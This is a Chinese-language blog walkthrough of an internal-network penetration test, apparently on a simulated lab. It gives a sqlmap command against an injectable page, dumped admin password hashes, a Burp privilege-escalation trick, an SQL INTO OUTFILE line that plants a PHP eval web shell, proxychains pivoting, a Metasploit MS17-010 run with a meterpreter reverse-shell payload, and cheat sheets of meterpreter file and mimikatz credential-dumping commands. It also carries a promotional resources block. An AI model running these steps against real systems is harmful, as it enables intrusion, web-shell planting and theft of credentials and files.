写点什么

记一次简单易上手的内网渗透实战

  • 2022 年 5 月 17 日
  • 本文字数:2532 字

    阅读完需:约 8 分钟

我们大部分渗透操作都是从外网开始的,如果要获得更多的机器权限和维持权限,就必须掌握内获得更多的机器权限和维持权限,就必须掌握内网渗透的技能。本次用通俗易懂的方式为大家讲解内网渗透的相关知识,建立内网渗透知识的框架,打开一扇新的大门 ,解决面试中内网相关的问题。


环境是模拟的


目标 IP192.168.31.102 该 web 主机下 有两台虚拟机


渗透目标: 拿到虚拟机的 shell


先信息收集、


目标绑定 jy.test.com


访问 192.168.31.196 存在探针



Nmap 端口扫描 192.168.31.196


开放 135、 3306 、 445 、 139、 80 端口


御剑扫描后台发现后台地址


并且存在 info 页面




【一>所有资源获取<一】

1、很多已经买不到的绝版电子书

2、安全大厂内部的培训资料

3、全套工具包

4、100 份 src 源码技术文档

5、网络安全基础入门、Linux、web 安全、攻防方面的视频

6、应急响应笔记

7、 网络安全学习路线

8、ctf 夺旗赛解析

9、WEB 安全入门笔记


一阶段:拿主站


访问目标网站


对主站进行测试的时候发现存在明显的 SQL 注入 payload




用 SQLmap 跑一把


python sqlmap.py -u"http://jy.test.com/person/cnresume_view.php?rid=1" --dbs



最后抛出 3 个管理,两个普通 1 个超级管理


超管没解开 hash


登陆用户:
dada
密码:mysql123
| a_id | a_user | a_pass |
+------+--------+---------------------------------------------+
| 1 | admin | fb0641386d3de664367b6a0b9f2ed5a2 |
| 2 | data | ed54ae97e472d89f0227cba22158731a (mysql123) |
| 3 | kefu | 17f3e52d5392ff8dc3c78b22db194f0d |
+------+--------+---------------------------------------------+
复制代码


用 data 普通管理登陆后台之后随便搞了搞发现竟然可以执行 sql 语句,我得天。。并且存在越权漏洞


first、先说一下这个越权漏洞


登陆 data 普通管理员账号


点击添加管理员提示无权限




用 burp 抓包修改参数,把管理改为超管




继续此操作添加了一个 admin 同级的超管



second、再说这个 sql 语句执行直接写入一句话木马


sql 命令


select "<?php eval($_POST[szg]);?>" into outfile "C:/UPUPW_AP5.2/htdocs/szg.php"



连接 1 句话木马上传



上传大马执行 arp -a


海岸该主机下还存在


192.168.238.129


192.168.238.130



三、


我们的 C 段实在 192.168.31 与目标内网并不在同一个段内


在 kaili 的 proxychains 和 reGeorgSocksProxy 配合进行代理


vim /etc/proxychains.conf


去掉 dynamic_chain 前面的 #号


去掉最后一行 socks4 那行,然后添加 socks5 127.0.0.1 8080(我的占用了这里是用的 1080)



shift+:wq 保存并退出


之后想让哪个命令或者应用通过代理直接用命令 proxychains+对应的命令或者应用,例如:


proxychains firefox


启动火狐浏览器


访问我们 ping 不通的 192.168.238.128 代理成功



用 nmap 进行扫描 192.168.238.129/130


目标开放 445 端口且是 XP 系统


我们

使用 exploit 模块来进行攻击测试


use exploit/windows/smb/ms17_010_psexec


set payload windows/x64/meterpreter/reverse_tcp //###set payload windows/meterpreter/reverse_tcp### //针对目标机器使用的系统版本,目标机器 32 位就使用 32 位(去掉*64)



run 返弹了一个 shell



系统是 system 权限没进行限制


添加一个用户



[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Hvzd9ZTV-1652793382222)(https://upload-images.jianshu.io/upload_images/26472780-5e70396c3a99ec32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]


下面的就自己操作了



下面是一些 MSF 中的常用命令


基本命令


help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个背景 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k  number #与会话进行交互close# 关闭通道exit# 终止 meterpreter 会话quit# 终止 meterpreter 会话interact id #切换进一个信道run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等irb# 进入 Ruby 脚本模式
复制代码


文件系统命令


cat c:\boot.ini#查看文件内容,文件必须存在del c:\boot.ini #删除指定的文件upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload  setup.exe C:\\windows\\system32\download nimeia.txt /root/Desktop/   # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/edit c:\boot.ini  # 编辑文件getlwd#打印本地目录getwd#打印工作目录lcd#更改本地目录ls#列出在当前目录中的文件列表lpwd#打印本地目录pwd#输出工作目录cd c:\\ #进入目录文件下rm file #删除文件mkdir dier #在受害者系统上的创建目录rmdir#受害者系统上删除目录dir#列出目标主机的文件和文件夹信息mv#修改目标主机上的文件名search -d d:\\www -f web.config #search 文件,如search  -d c:\\  -f*.docmeterpreter > search -f autoexec.bat  #搜索文件meterpreter > search -f sea*.bat c:\\xamp\\enumdesktops     #用户登录数
复制代码


(1)下载文件


使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件


(2)上传文件


“upload”命令为上传文件到我们的目标机器,在图中我们上传了 ll.txt 到目标机器的 c:\pp\下。


(3)查看文件


“cat filename”在当前目录下查看文件内容,输入命令后便会返回给我们所查看文件的内容。


mimikatz 模块:


meterpreter > load mimikatz  #加载mimikatzmeterpreter > msv #获取hash值meterpreter > kerberos #获取明文meterpreter >ssp   #获取明文信息meterpreter > wdigest #获取系统账户信息meterpreter >mimikatz_command -f a::   #必须要以错误的模块来让正确的模块显示meterpreter >mimikatz_command -f hash::   #获取目标 hashmeterpreter > mimikatz_command -f samdump::hashesmeterpreter > mimikatz_command -f sekurlsa::searchPasswords
复制代码


用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
记一次简单易上手的内网渗透实战_黑客_网络安全学海_InfoQ写作社区